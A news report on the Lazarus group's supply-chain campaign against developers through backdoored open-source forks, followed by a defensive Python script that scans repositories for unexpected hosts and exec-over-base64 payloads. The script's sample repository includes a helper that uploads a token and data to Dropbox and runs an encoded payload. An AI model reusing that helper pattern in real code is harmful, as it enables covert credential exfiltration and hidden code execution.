A North Korean hacking group known as Lazarus has shifted from one-off attacks to a long-term, strategic approach in a series of software supply chain infiltrations. According to a report by SecurityScorecard, Lazarus executed Operation Phantom Circuit, concealing malicious code within trusted software to silently access developers' data.
The campaign unfolded in multiple phases. In November 2024, 181 developers, mostly from Europe's tech sector, were impacted. By December, the victim count had grown to 1,225, including 284 in India and 21 in Brazil. In January 2025, the count of affected devices was 233, 110 of them belonging to India's IT sector.
The primary targets are cryptocurrency app developers, tech companies, and open-source software creators. Lazarus duplicated popular open-source projects and inserted backdoors. Infected repositories included Codementor, Coinproperty, Web3 E-Store, Python passwords, and other crypto-related applications.
Once a malicious fork is running on a developer's computer, Lazarus activates a backdoor for remote access, data extraction, and transfer to North Korea. The stolen data comprises accounts, authentication details, and password tokens, usable for future attacks or for intelligence gathering on behalf of the DPRK government. The group redirects stolen information to Dropbox to evade detection.
Notably, the malware spreads via GitLab, a widely used platform for collaborative software development. This allows Lazarus to introduce harmful updates that developers install unwittingly because they trust the source. To mask its activity, the group uses VPNs and proxy servers, obscuring the attack's true origin.
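The article describes two things a developer can check for before trusting a cloned fork: code that exfiltrates data to an external service (here, Dropbox) and a hidden backdoor. The script below is an added example, not code from SecurityScorecard's report or from any of the affected projects. It walks a repository, flags URLs whose host is not on an allowlist, and flags the common hidden-payload pattern of `exec()` over a base64-decoded string. The allowlist, the sample repository contents and the `<payload>` placeholder are constructed for the example; `content.dropboxapi.com` is Dropbox's public API host.

```python
import os
import re
import tempfile
from pathlib import Path

# Hosts a build or dev script is expected to talk to. Constructed allowlist;
# a real one would be derived from the project's declared dependencies.
ALLOWED_HOSTS = {"pypi.org", "files.pythonhosted.org", "github.com"}

# Any http(s) URL: capture the host so it can be compared with the allowlist.
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")
# exec() applied directly to a base64-decoded blob: a generic marker of a
# payload the author did not want a reviewer to read in plain text.
EXEC_RE = re.compile(r"\bexec\s*\(\s*(?:base64\.)?b64decode\s*\(")

SKIP_DIRS = {".git", "node_modules", "__pycache__"}
TEXT_SUFFIXES = {".py", ".js", ".ts", ".json", ".toml", ".cfg", ".txt", ".sh", ".yml", ".yaml"}


def scan_file(path: Path, root: Path):
    """Return (relative path, line number, rule, detail) tuples for one file."""
    findings = []
    try:
        lines = path.read_text(encoding="utf-8", errors="replace").splitlines()
    except OSError:
        return findings
    rel = path.relative_to(root).as_posix()
    for lineno, line in enumerate(lines, 1):
        for host in URL_RE.findall(line):
            if host.lower() not in ALLOWED_HOSTS:
                findings.append((rel, lineno, "unexpected-host", host.lower()))
        if EXEC_RE.search(line):
            findings.append((rel, lineno, "encoded-exec", line.strip()))
    return findings


def scan_repo(root):
    """Walk a checked-out repository and collect findings from all text files."""
    root = Path(root)
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d not in SKIP_DIRS]
        for name in filenames:
            p = Path(dirpath) / name
            if p.suffix in TEXT_SUFFIXES:
                findings.extend(scan_file(p, root))
    return sorted(findings)


# Constructed sample repository: one benign module and one helper that uploads
# data to Dropbox and runs a hidden payload. The "<payload>" string is a placeholder.
SAMPLE_FILES = {
    "app.py": 'import requests\n\ndef fetch():\n    return requests.get("https://pypi.org/simple/")\n',
    "utils/helper.py": (
        "import base64, requests\n"
        "def sync(token, blob):\n"
        '    requests.post("https://content.dropboxapi.com/2/files/upload", '
        'headers={"Authorization": "Bearer " + token}, data=blob)\n'
        'exec(base64.b64decode("<payload>"))\n'
    ),
}


def build_sample_repo():
    """Write the constructed sample files into a fresh temp dir and return its path."""
    root = Path(tempfile.mkdtemp(prefix="fork-audit-"))
    for rel, content in SAMPLE_FILES.items():
        target = root / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(content, encoding="utf-8")
    return root


def demo():
    """Scan the constructed sample repo; returns the sorted findings list."""
    return scan_repo(build_sample_repo())


if __name__ == "__main__":
    for rel, lineno, rule, detail in demo():
        print(f"{rel}:{lineno}: {rule}: {detail}")
```

Run it against a real clone with `scan_repo("/path/to/fork")` and review every hit by hand; the allowlist is the part worth tuning per project, since a legitimate build may call hosts the sample does not include.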
SecurityScorecard employs analytical tools and large data sets to produce accurate and relevant security assessments. Serving a diverse clientele, including large corporations, government entities, and small businesses, the company helps organizations evaluate and strengthen their cybersecurity measures.